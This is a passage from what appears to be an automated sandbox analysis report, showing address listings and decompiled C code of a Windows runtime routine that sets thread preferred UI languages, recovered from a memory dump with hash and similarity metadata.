                                                0x01612586
                                                0x01612590
                                                0x01612596
                                                0x01612597
                                                0x01612598
                                                0x01612599
                                                0x0161259e
                                                0x016125a4
                                                0x016125a9
                                                0x016125ac
                                                0x016125ae
                                                0x016125b1
                                                0x016125b2
                                                0x016125b5
                                                0x016125b8
                                                0x016125bb
                                                0x016125bc
                                                0x016125bf
                                                0x016125c2
                                                0x016125c5
                                                0x016125c6
                                                0x016125cb
                                                0x016125ce
                                                0x016125d8
                                                0x016125dd
                                                0x016125de
                                                0x016125e1
                                                0x016125e3
                                                0x016125e9
                                                0x016126da
                                                0x016126da
                                                0x016126dd
                                                0x016126e2
                                                0x01655b56
                                                0x00000000
                                                0x016126e8
                                                0x016126f9
                                                0x016126fb
                                                0x016126fe
                                                0x01612700
                                                0x01655b60
                                                0x00000000
                                                0x01612706
                                                0x01612706
                                                0x0161270a
                                                0x0161270a
                                                0x0161270d
                                                0x01612713
                                                0x01612716
                                                0x01612718
                                                0x0161271c
                                                0x0161271e
                                                0x01655b6c
                                                0x01655b6f
                                                0x01655b7f
                                                0x01655b89
                                                0x01655b8e
                                                0x01655b93
                                                0x01655b96
                                                0x01655b9c
                                                0x01655ba0
                                                0x01655ba3
                                                0x01655bab
                                                0x01655bb0
                                                0x01655bb3
                                                0x01655bb3
                                                0x01655ba3
                                                0x01612724
                                                0x01612726
                                                0x01612729
                                                0x0161272c
                                                0x0161279d
                                                0x0161279d
                                                0x016127a0
                                                0x016127a2
                                                0x00000000
                                                0x0161272e
                                                0x0161272e
                                                0x01612731
                                                0x01612734
                                                0x01612734
                                                0x01612736
                                                0x01655bc1
                                                0x01655bc1
                                                0x01655bc4
                                                0x00000000
                                                0x01655bca
                                                0x01655bca
                                                0x01655bcd
                                                0x00000000
                                                0x01655bd3
                                                0x00000000
                                                0x01655bd3
                                                0x01655bcd
                                                0x0161273c
                                                0x0161273c
                                                0x01612742
                                                0x01612747
                                                0x0161274a
                                                0x0161274d
                                                0x01612750
                                                0x00000000
                                                0x01612756
                                                0x01612756
                                                0x00000000
                                                0x01612902
                                                0x01612908
                                                0x0161290b
                                                0x00000000
                                                0x01612911
                                                0x0161291c
                                                0x01612921
                                                0x00000000
                                                0x01612921
                                                0x00000000
                                                0x00000000
                                                0x01612880
                                                0x01612887
                                                0x0161288c
                                                0x00000000
                                                0x00000000
                                                0x01612805
                                                0x0161280a
                                                0x01612814
                                                0x01612816
                                                0x00000000
                                                0x00000000
                                                0x0161281e
                                                0x01612821
                                                0x01612823
                                                0x00000000
                                                0x01612829
                                                0x01612829
                                                0x01612831
                                                0x0161283c
                                                0x0161283e
                                                0x00000000
                                                0x0161283e
                                                0x00000000
                                                0x00000000
                                                0x0161284e
                                                0x01612850
                                                0x01612851
                                                0x01612854
                                                0x01612857
                                                0x0161285a
                                                0x0161285c
                                                0x0161285d
                                                0x00000000
                                                0x00000000
                                                0x0161275d
                                                0x01612761
                                                0x00000000
                                                0x01612767
                                                0x0161276e
                                                0x01612773
                                                0x01612773
                                                0x01612776
                                                0x01612778
                                                0x0161277e
                                                0x0161277e
                                                0x01612781
                                                0x01612781
                                                0x01612783
                                                0x01612784
                                                0x00000000
                                                0x00000000
                                                0x01655bd8
                                                0x01655bde
                                                0x01655be4
                                                0x01655be6
                                                0x01655be8
                                                0x01655be9
                                                0x01655bee
                                                0x01655bf8
                                                0x01655bff
                                                0x01655c01
                                                0x01655c04
                                                0x01655c07
                                                0x01655c0b
                                                0x01655c0d
                                                0x01655c0d
                                                0x01655c15
                                                0x01655c18
                                                0x01655c1b
                                                0x01655c1b
                                                0x01655c1e
                                                0x00000000
                                                0x00000000
                                                0x016128c3
                                                0x016128c8
                                                0x016128d2
                                                0x016128d4
                                                0x016128d8
                                                0x016128db
                                                0x01655c26
                                                0x01655c28
                                                0x01655c2d
                                                0x01655c2d
                                                0x00000000
                                                0x00000000
                                                0x01655c34
                                                0x01655c36
                                                0x01655c49
                                                0x01655c4e
                                                0x01655c54
                                                0x01655c5b
                                                0x01655c5d
                                                0x01655c60
                                                0x01612788
                                                0x01612788
                                                0x0161278b
                                                0x0161278e
                                                0x0161278e
                                                0x0161278e
                                                0x01612791
                                                0x00000000
                                                0x00000000
                                                0x01612756
                                                0x01612750
                                                0x00000000
                                                0x01612794
                                                0x01612794
                                                0x01612795
                                                0x01612798
                                                0x01612798
                                                0x00000000
                                                0x01612734
                                                0x0161272c
                                                0x01612700
                                                0x016125ef
                                                0x016125ef
                                                0x016125ef
                                                0x016125f2
                                                0x016125f8
                                                0x00000000
                                                0x00000000
                                                0x016125fe
                                                0x00000000
                                                0x016128e6
                                                0x016128ec
                                                0x016128ef
                                                0x016128f5
                                                0x016128f8
                                                0x016128f8
                                                0x00000000
                                                0x016128f8
                                                0x00000000
                                                0x00000000
                                                0x01612866
                                                0x01612866
                                                0x01612876
                                                0x01612879
                                                0x00000000
                                                0x00000000
                                                0x016127e0
                                                0x016127e7
                                                0x016127e9
                                                0x016127eb
                                                0x01655afd
                                                0x00000000
                                                0x01655afd
                                                0x00000000
                                                0x00000000
                                                0x01612633
                                                0x01612638
                                                0x0161263b
                                                0x0161263c
                                                0x0161263e
                                                0x01612640
                                                0x01612642
                                                0x01612647
                                                0x01612649
                                                0x0161264e
                                                0x01612650
                                                0x01612653
                                                0x01612659
                                                0x016126a2
                                                0x016126a7
                                                0x016126ac
                                                0x016126b2
                                                0x01655b11
                                                0x01655b15
                                                0x01655b17
                                                0x00000000
                                                0x016126b8
                                                0x016126b8
                                                0x016126ba
                                                0x016127a6
                                                0x016127a6
                                                0x016127a9
                                                0x016127ab
                                                0x016127b9
                                                0x016127b9
                                                0x016127be
                                                0x016127c1
                                                0x016127c3
                                                0x016127c5
                                                0x016127c7
                                                0x01655c74
                                                0x01655c79
                                                0x01655c79
                                                0x016127c7
                                                0x00000000
                                                0x016126c0
                                                0x016126c0
                                                0x016126c3
                                                0x016126c6
                                                0x016126c6
                                                0x016126c9
                                                0x016126c9
                                                0x00000000
                                                0x016126c9
                                                0x016126ba
                                                0x0161265b
                                                0x0161265b
                                                0x0161265e
                                                0x01612667
                                                0x0161266d
                                                0x01612677
                                                0x0161267c
                                                0x0161267f
                                                0x01612681
                                                0x01655b49
                                                0x01655b4e
                                                0x016127cd
                                                0x016127d0
                                                0x016127d1
                                                0x016127d2
                                                0x016127d4
                                                0x016127dd
                                                0x01612687
                                                0x01612687
                                                0x0161268a
                                                0x0161268b
                                                0x0161268e
                                                0x0161268f
                                                0x01612691
                                                0x01612696
                                                0x01612698
                                                0x0161269d
                                                0x0161269f
                                                0x00000000
                                                0x0161269f
                                                0x01612681
                                                0x00000000
                                                0x00000000
                                                0x01612846
                                                0x00000000
                                                0x00000000
                                                0x01612605
                                                0x0161260a
                                                0x0161260c
                                                0x01612611
                                                0x01612616
                                                0x01612619
                                                0x01612619
                                                0x0161261e
                                                0x00000000
                                                0x01612624
                                                0x01612627
                                                0x01612627
                                                0x00000000
                                                0x00000000
                                                0x01655b1f
                                                0x00000000
                                                0x00000000
                                                0x01612894
                                                0x0161289b
                                                0x0161289d
                                                0x016128a1
                                                0x01655b2b
                                                0x01655b2e
                                                0x01655b2e
                                                0x016128a7
                                                0x016128a9
                                                0x01655b04
                                                0x01655b09
                                                0x01655b09
                                                0x01655b09
                                                0x00000000
                                                0x00000000
                                                0x01655b35
                                                0x01655b3c
                                                0x016128fb
                                                0x016128fb
                                                0x016126cc
                                                0x016126cc
                                                0x016126d0
                                                0x00000000
                                                0x016126d2
                                                0x016126d2
                                                0x00000000
                                                0x016126d2
                                                0x00000000
                                                0x00000000
                                                0x016125fe
                                                0x0161292d
                                                0x0161292f
                                                0x01612930
                                                0x01612935
                                                0x01612937
                                                0x01612938
                                                0x0161293b
                                                0x0161293c
                                                0x0161293e
                                                0x0161293f
                                                0x01612940
                                                0x01612942
                                                0x01612944
                                                0x01612947
                                                0x01612948
                                                0x0161294e
                                                0x0161294f
                                                0x01612957
                                                0x0161295a
                                                0x0161295d
                                                0x01612960
                                                0x01612962
                                                0x01612963
                                                0x01612964
                                                0x01612966
                                                0x01612969
                                                0x0161296a
                                                0x0161296e
                                                0x0161296f
                                                0x01612972
                                                0x01612973
                                                0x0161297b
                                                0x0161297e
                                                0x0161297f
                                                0x01612980
                                                0x01612981
                                                0x01612982
                                                0x01612983
                                                0x01612984
                                                0x01612985
                                                0x01612986
                                                0x01612987
                                                0x01612988
                                                0x01612989
                                                0x0161298a
                                                0x0161298b
                                                0x0161298c
                                                0x0161298d
                                                0x0161298e
                                                0x0161298f
                                                0x01612990
                                                0x01612992
                                                0x01612997
                                                0x016129a3
                                                0x016129a6
                                                0x016129ab
                                                0x016129ad
                                                0x016129b0
                                                0x016129b2
                                                0x01655c80
                                                0x016129b8
                                                0x016129b8
                                                0x016129bb
                                                0x016129c0
                                                0x016129c5
                                                0x016129c6
                                                0x016129c6
                                                0x016129c9
                                                0x016129cb
                                                0x00000000
                                                0x00000000
                                                0x016129cd
                                                0x016129d0
                                                0x016129d9
                                                0x016129db
                                                0x016129dd
                                                0x01612a7f
                                                0x01612a84
                                                0x01612a87
                                                0x01612a89
                                                0x01655ca1
                                                0x01655ca3
                                                0x00000000
                                                0x01612a8f
                                                0x01612a8f
                                                0x00000000
                                                0x01612a8f
                                                0x00000000
                                                0x016129e3
                                                0x016129e3
                                                0x016129e3
                                                0x00000000
                                                0x016129e3
                                                0x016129dd
                                                0x00000000
                                                0x016129db
                                                0x016129e6
                                                0x016129e9
                                                0x016129eb
                                                0x016129ed
                                                0x016129f3
                                                0x016129f5
                                                0x016129f8
                                                0x016129fa
                                                0x01612a97
                                                0x01612a9a
                                                0x01612a9d
                                                0x01612add
                                                0x00000000
                                                0x01612a9f
                                                0x01612aa2
                                                0x01612aa5
                                                0x01612aa8
                                                0x01612aab
                                                0x01655cab
                                                0x01655caf
                                                0x01655cc5
                                                0x01655cda
                                                0x01655cdc
                                                0x01655cdf
                                                0x01655ce5
                                                0x00000000
                                                0x01655ceb
                                                0x01655ced
                                                0x01655cee
                                                0x00000000
                                                0x01655cee
                                                0x01655cb1
                                                0x01655cb4
                                                0x01655cb9
                                                0x01655cbb
                                                0x00000000
                                                0x01655cbd
                                                0x01655cbd
                                                0x00000000
                                                0x01655cbd
                                                0x01655cbb
                                                0x01612ab1
                                                0x01612ab1
                                                0x01612ac4
                                                0x01612ac6
                                                0x01612ac6
                                                0x00000000
                                                0x01612ac6
                                                0x01612aab
                                                0x00000000
                                                0x01612a00
                                                0x01612a09
                                                0x01612a0e
                                                0x01612a21
                                                0x01612a24
                                                0x01612a35
                                                0x01612a3a
                                                0x01612a3d
                                                0x01612a42
                                                0x01612a59
                                                0x01612a59
                                                0x01612a5c
                                                0x01612a5f
                                                0x01612a5f
                                                0x016129fa
                                                0x016129f3
                                                0x01612a64
                                                0x01612a64
                                                0x01612a6b
                                                0x01612a6b
                                                0x01612a6d
                                                0x01612a72
                                                0x01612a72
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: PATH
                                                • API String ID: 0-1036084923
                                                • Opcode ID: 268f0c69ece90002a197d61fb56b70cbf1a77f349cfadc421b4ae1054251d782
                                                • Instruction ID: 7cb96f2a3b367e6e352ce561b24e2adb7c4dd83f9a31d286a8fdafabd6231fb4
                                                • Opcode Fuzzy Hash: 268f0c69ece90002a197d61fb56b70cbf1a77f349cfadc421b4ae1054251d782
                                                • Instruction Fuzzy Hash: 93C18F71D002199FDB25DF99DC90ABEBBB5FF48700F28442DE901AB354D734A952CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 80%
                                                			E0161FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E015FEEF0(0x16d7b60);
					_t134 =  *0x16d7b84; // 0x776f7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x16d7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x16d7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E015F6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E015F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01688938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E015EB150();
													}
													_t116 = E01686D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E015F75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x16d8638; // 0x0
																	_t122 = L015F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E015F76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E015F76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0161FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L015F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0161FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0161FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0161FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0161FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0161FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x16d7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x16d7b84 = _t75;
						_t73 = E015FEB70(_t134, 0x16d7b60);
						if( *0x16d7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E015FFF60( *0x16d7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                0x0161fab0
                                                0x0161fab2
                                                0x0161fab3
                                                0x0161fab4
                                                0x0161fabc
                                                0x0161fac0
                                                0x0161fb14
                                                0x0161fb17
                                                0x0161fac2
                                                0x0161fac8
                                                0x0161facd
                                                0x0161fad3
                                                0x0161fad3
                                                0x0161fadd
                                                0x0161fb18
                                                0x0161fb1b
                                                0x0161fb1d
                                                0x0161fb1e
                                                0x0161fb1f
                                                0x0161fb20
                                                0x0161fb21
                                                0x0161fb22
                                                0x0161fb23
                                                0x0161fb24
                                                0x0161fb25
                                                0x0161fb26
                                                0x0161fb27
                                                0x0161fb28
                                                0x0161fb29
                                                0x0161fb2a
                                                0x0161fb2b
                                                0x0161fb2c
                                                0x0161fb2d
                                                0x0161fb2e
                                                0x0161fb2f
                                                0x0161fb3a
                                                0x0161fb3b
                                                0x0161fb3e
                                                0x0161fb41
                                                0x0161fb44
                                                0x0161fb47
                                                0x0161fb4a
                                                0x0161fb4d
                                                0x0161fb53
                                                0x0165bdcb
                                                0x0165bdcb
                                                0x0161fb59
                                                0x0161fb5b
                                                0x0161fb5b
                                                0x0161fb5e
                                                0x0165bdd5
                                                0x0165bdd8
                                                0x00000000
                                                0x0165bdda
                                                0x00000000
                                                0x0165bdda
                                                0x0161fb64
                                                0x0161fb64
                                                0x0161fb64
                                                0x0161fb67
                                                0x0161fb6e
                                                0x0161fb70
                                                0x0161fb72
                                                0x00000000
                                                0x0161fb78
                                                0x0161fb7a
                                                0x0161fb7a
                                                0x0161fb7d
                                                0x0161fb80
                                                0x0165bddf
                                                0x0165bde1
                                                0x00000000
                                                0x0165bde3
                                                0x00000000
                                                0x0165bde3
                                                0x0161fb86
                                                0x0161fb86
                                                0x0161fb86
                                                0x0161fb8b
                                                0x0161fb90
                                                0x0161fb92
                                                0x0161fb94
                                                0x0161fb9a
                                                0x0161fb9b
                                                0x0161fba1
                                                0x0165bde8
                                                0x0165bdeb
                                                0x0165bded
                                                0x0165beb5
                                                0x0165beb5
                                                0x0165bebb
                                                0x0165bebd
                                                0x0165bec3
                                                0x0165bed2
                                                0x0165bedd
                                                0x0165bedd
                                                0x0165beed
                                                0x00000000
                                                0x0165bdf3
                                                0x0165bdfe
                                                0x0165be06
                                                0x0165be0b
                                                0x0165be0d
                                                0x0165be0f
                                                0x0165be14
                                                0x0165be19
                                                0x0165be20
                                                0x0165be25
                                                0x0165be27
                                                0x0165be35
                                                0x0165be39
                                                0x0165be46
                                                0x0165be4f
                                                0x0165be54
                                                0x0165be56
                                                0x0165bef8
                                                0x0165bef8
                                                0x00000000
                                                0x0165be5c
                                                0x0165be5c
                                                0x0165be60
                                                0x00000000
                                                0x0165be66
                                                0x0165be66
                                                0x0165be7f
                                                0x0165be84
                                                0x0165be87
                                                0x0165be89
                                                0x0165be8b
                                                0x0165be99
                                                0x0165be9d
                                                0x0165bea0
                                                0x0165beac
                                                0x0165beaf
                                                0x0165beb1
                                                0x0165beb3
                                                0x0165beb3
                                                0x00000000
                                                0x0165bea2
                                                0x0165bea2
                                                0x00000000
                                                0x0165bea2
                                                0x0165be8d
                                                0x0165be8d
                                                0x0165be92
                                                0x00000000
                                                0x0165be92
                                                0x0165be8b
                                                0x0165be60
                                                0x0165be3b
                                                0x0165be3b
                                                0x0165be3e
                                                0x00000000
                                                0x0165be40
                                                0x0165be40
                                                0x0165be44
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0165be44
                                                0x0165be3e
                                                0x0165be29
                                                0x0165be29
                                                0x00000000
                                                0x0165be29
                                                0x0165be27
                                                0x00000000
                                                0x0161fba7
                                                0x0161fba7
                                                0x0161fbab
                                                0x0165bf02
                                                0x0161fbb1
                                                0x0161fbb1
                                                0x0161fbb8
                                                0x0161fbbd
                                                0x0161fbbd
                                                0x0161fbbf
                                                0x0161fbbf
                                                0x0161fbc5
                                                0x0161fbcb
                                                0x0161fbf8
                                                0x0161fbf8
                                                0x0161fbfa
                                                0x00000000
                                                0x0161fc00
                                                0x0161fc00
                                                0x0161fc03
                                                0x00000000
                                                0x0161fc09
                                                0x0161fc09
                                                0x0161fc0f
                                                0x0161fc15
                                                0x0161fc23
                                                0x0161fc23
                                                0x0161fc25
                                                0x0161fc27
                                                0x0161fc75
                                                0x0161fc7c
                                                0x0161fc84
                                                0x00000000
                                                0x0161fc29
                                                0x0161fc29
                                                0x0161fc2d
                                                0x0161fc30
                                                0x0165bf0f
                                                0x00000000
                                                0x0161fc36
                                                0x0161fc38
                                                0x0161fc3b
                                                0x0161fc41
                                                0x0165bf17
                                                0x0165bf19
                                                0x0165bf48
                                                0x0165bf4b
                                                0x00000000
                                                0x0165bf1b
                                                0x0165bf22
                                                0x0165bf24
                                                0x0165bf26
                                                0x00000000
                                                0x0165bf2c
                                                0x0165bf37
                                                0x0165bf39
                                                0x0165bf3b
                                                0x00000000
                                                0x0165bf41
                                                0x0165bf41
                                                0x0165bf41
                                                0x0165bf41
                                                0x0165bf45
                                                0x00000000
                                                0x0165bf45
                                                0x0165bf3b
                                                0x0165bf26
                                                0x00000000
                                                0x0161fc47
                                                0x0161fc47
                                                0x0161fc49
                                                0x0161fcb2
                                                0x0161fcb4
                                                0x0161fcb6
                                                0x0161fcdc
                                                0x0161fcdc
                                                0x00000000
                                                0x0161fcb8
                                                0x0161fcc3
                                                0x0161fcc5
                                                0x0161fcc7
                                                0x00000000
                                                0x0161fcc9
                                                0x0161fcc9
                                                0x0161fccd
                                                0x00000000
                                                0x0161fccd
                                                0x0161fcc7
                                                0x00000000
                                                0x0161fc4b
                                                0x0161fc4b
                                                0x0161fc4e
                                                0x0161fc4e
                                                0x0161fc51
                                                0x0161fc51
                                                0x0161fc54
                                                0x0161fc5a
                                                0x0161fc5c
                                                0x0161fc5f
                                                0x0161fc61
                                                0x0161fc63
                                                0x0161fc65
                                                0x0161fc67
                                                0x0161fc6e
                                                0x0161fc72
                                                0x0161fc72
                                                0x0161fc72
                                                0x0161fc72
                                                0x0161fc67
                                                0x0161fc61
                                                0x00000000
                                                0x0161fc5a
                                                0x0161fc49
                                                0x0161fc41
                                                0x0161fc30
                                                0x0161fc27
                                                0x0161fc03
                                                0x0161fbcd
                                                0x0161fbd3
                                                0x0161fbd9
                                                0x0161fbdc
                                                0x0161fbde
                                                0x0161fc99
                                                0x0161fc9b
                                                0x0161fc9d
                                                0x0161fcd5
                                                0x0161fcd5
                                                0x0161fc89
                                                0x0161fc89
                                                0x00000000
                                                0x0161fc9f
                                                0x0161fc9f
                                                0x0161fca3
                                                0x00000000
                                                0x0161fca3
                                                0x00000000
                                                0x0161fbe4
                                                0x0161fbe4
                                                0x0161fbe4
                                                0x0161fbe4
                                                0x0161fbe9
                                                0x0161fbf2
                                                0x00000000
                                                0x0161fbf2
                                                0x0161fbde
                                                0x0161fbcb
                                                0x0161fbab
                                                0x0161fc8b
                                                0x0161fc8b
                                                0x0161fc8c
                                                0x0161fb80
                                                0x0161fb72
                                                0x0161fb5e
                                                0x0161fc8d
                                                0x0161fc91
                                                0x0161fadf
                                                0x0161fadf
                                                0x0161fae1
                                                0x0161fae4
                                                0x0161fae7
                                                0x0161faec
                                                0x0161faf8
                                                0x0161fb00
                                                0x0161fb07
                                                0x0161fb0f
                                                0x0161fb0f
                                                0x0161fb07
                                                0x00000000
                                                0x0161faf8
                                                0x0161fadd

                                                Strings
                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0165BE0F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                • API String ID: 0-865735534
                                                • Opcode ID: 101e6d4ba857f62d766fb2a43c8c05786a6db9eca8f4d48eab8ad3900a21a43e
                                                • Instruction ID: a35b7ff78487b38894f26682db896509716a6c8bb304a41c2eaffe54c33737e7
                                                • Opcode Fuzzy Hash: 101e6d4ba857f62d766fb2a43c8c05786a6db9eca8f4d48eab8ad3900a21a43e
                                                • Instruction Fuzzy Hash: 59A11672B006068BEB25DF68CC5077AB7A6BF48710F0845ADDE46DB795DB30D845DB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015E2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 63%
                                                			E015E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
